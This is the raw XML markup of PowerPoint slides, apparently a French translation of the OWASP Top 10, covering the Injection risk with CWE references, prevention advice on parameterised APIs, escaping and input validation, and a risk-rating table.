            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externe</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE Entry 77 on Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE Entry 89 on SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE Entry 564 on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>Hibernate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t> Injection</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comment prévenir l’Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prévenir l’Injection exige de séparer les données non fiables des commandes et requêtes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La meilleure option est d’utiliser une API saine qui évite complètement l’utilisation de l’interpréteur ou fournit une interface paramétrable.  Attention aux APIs, telles les procédures stockées, qui sont paramétrables, mais qui pourraient introduire une Injection sous le capot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>En l’absence d’API paramétrable, vous devriez soigneusement échapper les caractères spéciaux en utilisant la syntaxe d’échappement spécifique à l’interpréteur. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fournit des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>routines d’échappement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour les données en entrée, la « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whitelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> » avec normalisation est recommandée, mais n’est </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> une défense complète, plusieurs applications exigeant des caractères spéciaux en entrée. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t> ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a une librairie extensible de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>routines de validation d’entrées</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 35"/>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fr-FR" dirty="0" smtClean="0"/>
              <a:t>A1</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-10981" y="1014596"/>
            <a:ext cx="6696109" cy="480859"/>
            <a:chOff x="-10981" y="1014596"/>
            <a:chExt cx="6696109" cy="480859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="41" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-10981" y="1014596"/>
              <a:ext cx="6696109" cy="480859"/>
              <a:chOff x="-10981" y="997424"/>
              <a:chExt cx="6696109" cy="480859"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30"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fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>           Vulnérabilité</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="11" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12"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algn="just" eaLnBrk="0" hangingPunct="0"/>
                  <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13"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pPr algn="just"/>
                  <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="14"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pPr algn="just"/>
                  <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="15"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pPr algn="just"/>
                  <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="16"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pPr algn="just"/>
                  <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="18"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square" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs d’Attaque</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="32"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square" lIns="72000" rIns="72000" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Impacts Techniques</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="51"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65"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79" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="30" idx="3"/>
                <a:endCxn id="32"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93" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-10981" y="1280701"/>
                <a:ext cx="1148071" cy="194925"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="just" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Facteurs de Menace</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29"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square" lIns="36000" rIns="36000" anchor="t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="fr-FR" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts Métier</a:t>
                </a:r>
                <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="113" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="32" idx="4"/>
                <a:endCxn id="29"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just" eaLnBrk="0" hangingPunct="0"/>
              <a:endParaRPr lang="fr-FR" sz="900" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="698824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04"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3867918834"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="956458"/>
          <a:ext cx="6858000" cy="2655422"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="643742">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gridSpan="2">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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>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c>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AD5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="393086">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifique</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Application</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smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitation</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MOYENNE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r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Fréquence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>RÉPANDUE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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Détection</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MOYENNE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200"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Impact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>GRAVE</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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Spécifique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Application/Métier</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1"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75203">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez des attaquants externes anonymes,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> aussi bien que </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des utilisateurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> légitimes essayant de voler des comptes tiers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Considérez aussi les utilisateurs internes voulant camoufler leurs actes.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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L'attaquant exploite des fuites/failles dans les fonctions</a:t>
                      </a:r>
